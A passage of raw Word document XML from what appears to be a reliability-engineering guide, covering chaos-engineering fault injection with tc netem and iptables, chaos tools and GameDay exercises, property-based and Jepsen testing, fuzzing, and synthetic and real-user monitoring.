        <w:t>Packet loss: tc netem loss 10% — drops 10% of packets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C5EA6D" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="376"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Network latency: tc netem delay 100ms 50ms distribution normal — adds 100ms ±50ms latency with normal distribution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DBF3F14" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="376"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Network partition: iptables rules blocking traffic between specific nodes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE38FD2" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="376"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Bandwidth limiting: tc tbf rate 1mbit — limits to 1Mbps.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="411155EA" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="376"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Packet corruption: tc netem corrupt 1% — flips random bits in 1% of packets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5119B7C4" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Application failures:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62ABB829" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="377"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Kill processes (SIGKILL bypasses graceful shutdown).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C4F48D" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="377"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Send SIGSTOP (freeze a process — simulates GC pause, I/O stall).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE6C87F" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="377"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Inject CPU load (spin up CPU-intensive threads alongside the application).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A692F9" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="377"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Inject memory pressure (allocate memory until OOM killer fires).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F60FDF9" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="377"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Return error codes from dependencies (mock upstream services to return 500s, timeouts).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06FC170C" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Dependency failures:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="100CD5D1" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="378"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Block access to external APIs at the network level.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57737E14" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="378"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Return malformed responses from dependencies (test response parsing reliability).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B8A63A" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="378"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Slow down dependency responses to simulate gradual degradation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ACDB432" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Chaos Engineering tooling:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0086B3B1" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Chaos Monkey (Netflix/Spinnaker):</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Integrates with Spinnaker to terminate random instances. Configurable schedules, groupings, exclusions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA83264" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Litmus Chaos (CNCF):</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Kubernetes-native chaos engineering. Chaos experiments as Kubernetes custom resources (ChaosExperiment, ChaosEngine). Pre-built experiments for pod deletion, node drain, network chaos, disk fill, CPU/memory stress.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A1FCCC" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Gremlin:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Commercial platform. Graphical UI for designing and running chaos experiments. Pre-built attack library. Automatic rollback when abort conditions trigger.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E6BF494" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Chaos Mesh (PingCAP):</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Kubernetes-native. Network chaos, pod chaos, stress chaos, I/O chaos (inject I/O errors into filesystem calls). Uses eBPF and tc netem under the hood.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E929CC4" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>GameDay exercises:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59950496" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>A GameDay is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>planned, cross-team simulation of a major failure</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t>. Unlike continuous Chaos Monkey (which is automated and narrow in scope), a GameDay is:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44DDD239" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="379"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Scheduled:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Team knows in advance a failure simulation will occur (but not the specific scenario).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD6A57C" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="379"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Broad scope:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Simulates complete region failure, primary database outage, DDoS attack — not just one instance termination.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2197322F" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="379"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Human-centric:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Tests whether the </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>people and processes</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> work, not just whether the technology works. Are runbooks accurate? Can on-call engineers execute the procedures under pressure? Does communication between teams function?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="406CE807" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="379"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Measured:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> RTO and RPO are measured during the exercise. Compare against targets. Identify gaps.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D0E1BCD" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Property-Based Testing for Reliability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="114D5759" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Beyond chaos engineering (infrastructure failures), reliability requires testing </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>correctness properties</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> of the system under various conditions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F1CBCEF" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Property-based testing</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> defines invariants that must always hold and generates hundreds or thousands of random inputs to test them:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C89013A" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="380"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>"After any sequence of write operations, the system must be readable and return the last written value for each key."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F00F731" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="380"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>"After any sequence of deposit and withdrawal operations, the account balance must equal initial balance + sum(deposits) - sum(withdrawals), and must never go negative."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43180D02" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="380"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>"Under any network partition and any sequence of operations, after partition heals, all nodes must converge to the same state."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CB7E962" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>These properties are not tested with fixed examples but with </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>exhaustive random generation</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t>. QuickCheck (Haskell), Hypothesis (Python), and jqwik (Java) are property-based testing frameworks. They have </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>shrinkers</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> — when a property violation is found, automatically find the minimal input that reproduces the violation (e.g., reducing a 1,000-operation sequence to the 5 operations that actually trigger the bug).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06811E69" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Jepsen testing:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Kyle Kingsbury's Jepsen tool specifically tests </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>distributed system consistency properties</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> by running concurrent operations across multiple nodes while injecting network partitions. It then analyzes the operation history for linearizability violations — detecting bugs where a distributed system claims to be consistent but isn't. Jepsen has found critical reliability bugs in Cassandra, MongoDB, Redis, etcd, and many others.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22785267" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Fuzz Testing for Reliability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CFDEBFE" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Fuzzing</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> generates random, malformed, or boundary-case inputs to find inputs that cause crashes, hangs, or incorrect behavior. For reliability:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3453606B" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="381"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Protocol fuzzing:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Send malformed network packets to the service. Does it crash? Does it hang? Does it consume unbounded memory trying to parse malformed input?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA6A722" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="381"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Input fuzzing:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Send malformed API inputs (null values where strings expected, negative numbers where positive expected, extremely long strings, Unicode edge cases). Does the service crash or return a clean error?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D66C161" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="381"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>State-based fuzzing:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Generate random sequences of operations (create, update, delete, read in random order with random parameters). Does the system reach any invalid state?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A159428" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Coverage-guided fuzzing (libFuzzer, AFL++):</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> The fuzzer instruments the binary to track which code paths are executed by each input. It generates new inputs that maximize code coverage — systematically exploring all branches and edge cases. This is orders of magnitude more effective than random fuzzing because it's guided toward unexplored code paths.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E1AE5A" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:pict w14:anchorId="055D57E7">
          <v:rect id="_x0000_i2788" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="64EA9B25" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7. Observability for Reliability — Detecting Problems Before Users Do</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="174EBC3A" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Reliability requires </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>knowing about problems before they cause user impact</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t>. This requires observability infrastructure that goes far beyond simple uptime monitoring.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4297B21F" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The Reliability Observability Stack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="509919D1" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Synthetic monitoring (active probing):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C803681" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Continuously send test requests to your service from external locations, simulating user behavior. Unlike infrastructure monitoring (is the server up?), synthetic monitoring tests the actual user-facing request path.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB7A297" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Heartbeat monitoring:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Simple GET request every 60 seconds. Alerts if the response isn't 200 OK within 5 seconds. Catches complete outages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E56FBF" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Transaction monitoring:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Multi-step flows (load homepage → search for product → add to cart → checkout). Catches failures in complex user journeys that heartbeat monitoring misses (the home page might be fine while checkout is broken).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64FCB3A6" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Geographic distribution:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Run probes from multiple regions. A region-specific failure (CDN misconfiguration, regional DNS issue) is invisible to a probe running in the same region as your servers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D84C929" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Real User Monitoring (RUM):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A260C46" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:lastRenderedPageBreak/>
        <w:t>JavaScript instrumented in the browser (or SDK in mobile apps) reports actual user experience metrics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B1C63A" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="382"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Core Web Vitals:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Largest Contentful Paint (LCP), Cumulative Layout Shift (CLS), First Input Delay (FID) — perceived performance from the user's browser.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F0E6F04" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="382"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>JavaScript errors:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Unhandled exceptions in client-side code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C5E563" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="382"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>API call latency and error rates:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> From the client's perspective (includes network latency, not just server processing time).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DFDE740" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="382"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Navigation timing:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Time from URL typed to page fully loaded.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="609D4562" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>RUM captures what users actually experience — not what your server-side metrics show. A server-side p99 of 200ms might correspond to a user-perceived p99 of 2 seconds because of CDN latency, DNS resolution, and TCP connection overhead.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C7BB737" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Distributed tracing for reliability:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01308111" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>When a request fails, tracing shows </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>exactly where</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> in the distributed call graph the failure occurred. Without tracing, a 500 error to the client might be caused by any of 10 downstream services — finding which one requires checking logs on every service. With tracing, the trace shows the failed span immediately.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD4129D" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
